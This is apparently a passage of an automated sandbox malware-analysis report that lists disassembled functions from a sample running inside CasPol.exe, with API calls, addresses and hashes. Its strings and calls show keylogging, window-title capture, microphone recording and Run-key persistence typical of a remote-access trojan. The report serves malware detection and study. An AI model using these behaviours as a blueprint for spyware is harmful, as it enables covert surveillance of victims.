                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(00000000), ref: 0041269D
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                            • String ID: @CG$exepath$BG
                                                                                            • API String ID: 4119054056-3221201242
                                                                                            • Opcode ID: 87f44056bfb88680dd3fb4540e9b2a816aacb5308ad949631011a61a52719725
                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                            • Opcode Fuzzy Hash: 87f44056bfb88680dd3fb4540e9b2a816aacb5308ad949631011a61a52719725
                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                            APIs
                                                                                              • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                              • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                              • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                            • String ID: [ $ ]
                                                                                            • API String ID: 3309952895-93608704
                                                                                            • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                            • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                            • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                            • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                            • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                            • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                            • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                            • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                            • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                            • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                              • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                              • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                            • String ID:
                                                                                            • API String ID: 737400349-0
                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                            • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                            • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                            • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                            • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                            • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                            APIs
                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                            • String ID:
                                                                                            • API String ID: 3919263394-0
                                                                                            • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                            • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                            • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                            • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem
                                                                                            • String ID:
                                                                                            • API String ID: 4116985748-0
                                                                                            • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                            • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                            • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                            • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                            APIs
                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3D3
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleOpenProcess
                                                                                            • String ID:
                                                                                            • API String ID: 39102293-0
                                                                                            • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                            • Instruction ID: bb9aee54fd4b55ef2446b45ef4d52834339351c189d8e7c886657dc3bd6b5f1d
                                                                                            • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                                                                            • Instruction Fuzzy Hash: 2FF04971204209ABD3106754AC4AFA7B27CDB40B96F000037FA61D22A1FFB4CCC146AE
                                                                                            APIs
                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorHandling__start
                                                                                            • String ID: pow
                                                                                            • API String ID: 3213639722-2276729525
                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                            • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                            • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CountEventTick
                                                                                            • String ID: >G
                                                                                            • API String ID: 180926312-1296849874
                                                                                            • Opcode ID: c9924a411c05cd8b39230ee1a82d916f7688eaf1a4f1107cad7b003e53377e8e
                                                                                            • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                            • Opcode Fuzzy Hash: c9924a411c05cd8b39230ee1a82d916f7688eaf1a4f1107cad7b003e53377e8e
                                                                                            • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID: $fD
                                                                                            • API String ID: 1807457897-3092946448
                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                            • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                            • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                            APIs
                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 0-711371036
                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                            • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                            • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                            Strings
                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                            • API String ID: 481472006-1507639952
                                                                                            • Opcode ID: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                            • Instruction ID: fa495feba5854bec2644a8330ceabc5ae1d4c14ac10d4033695aa89a80f4fa5c
                                                                                            • Opcode Fuzzy Hash: dc814d6e6e9b329a3c520177c865058c28860881db4f8f765c6194f4c7b1d50e
                                                                                            • Instruction Fuzzy Hash: 5A2126A1A042806BC310FB6AD80A76B7B9497D1319F44407EF849532E2DB3C5999CB9F
                                                                                            APIs
                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime
                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                            • API String ID: 481472006-2430845779
                                                                                            • Opcode ID: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                            • Instruction ID: d205b4ebe2adc0156a37935a73d605e8b5d9817e81284f53efab16a15aec7ece
                                                                                            • Opcode Fuzzy Hash: d622afb61c2cb1ab41a02553fe090b68cebd57ba43e85abe14a248f4384d1e5f
                                                                                            • Instruction Fuzzy Hash: 80114C725082045AC704EBA5D8568AF73E8AB94708F10053FFC85931E1EF38DA84C69E
                                                                                            APIs
                                                                                            • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExistsFilePath
                                                                                            • String ID: alarm.wav$xIG
                                                                                            • API String ID: 1174141254-4080756945
                                                                                            • Opcode ID: 319363a0a98ecc91b18a03f0251e716ffd11e5954bb7b3f8cb3ebdf27e687e2f
                                                                                            • Instruction ID: 7a4fe07350b1461b8d7cab7706a536354aa1130be6e3c83a2e6414618e768e61
                                                                                            • Opcode Fuzzy Hash: 319363a0a98ecc91b18a03f0251e716ffd11e5954bb7b3f8cb3ebdf27e687e2f
                                                                                            • Instruction Fuzzy Hash: 8B01802060420166C604B676D866AEE77458BC1719F40413FF89A966E2EF6CAEC6C2DF
                                                                                            APIs
                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                            • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                            • String ID: Online Keylogger Stopped
                                                                                            • API String ID: 1623830855-1496645233
                                                                                            • Opcode ID: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                            • Instruction ID: 3c154674506c802d119dc10506b29c5389a087cae46ba36945c53301bfe6088f
                                                                                            • Opcode Fuzzy Hash: 646206393e16704f2753a74233abb12183abfc7c86e0053c12af51a0f8e1eb29
                                                                                            • Instruction Fuzzy Hash: CC01D431A043019BDB25BB35C80B7AEBBB59B45315F80407FE481225D2EB7999A6C3DB
                                                                                            APIs
                                                                                            • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 00401747
                                                                                            • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: wave$BufferHeaderPrepare
                                                                                            • String ID: T=G
                                                                                            • API String ID: 2315374483-379896819
                                                                                            • Opcode ID: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                            • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                                                            • Opcode Fuzzy Hash: ed973bd8c39c0a7b185882100a87dfb7002c9bb2a5c1b7b6d1ae35d6c30925d6
                                                                                            • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                                                            APIs
                                                                                            • IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LocaleValid
                                                                                            • String ID: IsValidLocaleName$j=D
                                                                                            • API String ID: 1901932003-3128777819
                                                                                            • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                            • Instruction ID: d075984350fdfa8650c9f53b231b8a0b142c4dacf6ed37e79753978632a381d4
                                                                                            • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                            • Instruction Fuzzy Hash: B7F0E930A45218F7EA116B61DC06F5EBB54CF49B11F50407AFD056A293CB796D0195DC
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog
                                                                                            • String ID: T=G$T=G
                                                                                            • API String ID: 3519838083-3732185208
                                                                                            • Opcode ID: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                            • Instruction ID: 37a3980bbf64332544f5ef03d086655580814226aad47650f393c0c18fea351b
                                                                                            • Opcode Fuzzy Hash: ece060f59eec47038b163f6730b9b4774a9df75ced3df6c836fae2af045d366e
                                                                                            • Instruction Fuzzy Hash: BCF0E971A00220ABC714BB65C80669EB774EF41369F10827FB416B72E1CBBD5D04D65D
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                                                              • Part of subcall function 00409B10: GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                              • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                              • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                              • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                              • Part of subcall function 00409B10: GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                              • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                            • String ID: [AltL]$[AltR]
                                                                                            • API String ID: 2738857842-2658077756
                                                                                            • Opcode ID: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                            • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                                                            • Opcode Fuzzy Hash: 80506e14bf35cdfd57388ac48183fdf9bd6fb207497dbc1ccda1b4521432daf8
                                                                                            • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 00448825
                                                                                              • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorFreeHeapLast_free
                                                                                            • String ID: `@$`@
                                                                                            • API String ID: 1353095263-20545824
                                                                                            • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                            • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                            • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                            • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                            APIs
                                                                                            • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: State
                                                                                            • String ID: [CtrlL]$[CtrlR]
                                                                                            • API String ID: 1649606143-2446555240
                                                                                            • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                            • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                            • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                            • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                            APIs
                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                            • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                            Strings
                                                                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.3839020888.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DeleteOpenValue
                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                            • API String ID: 2654517830-1051519024
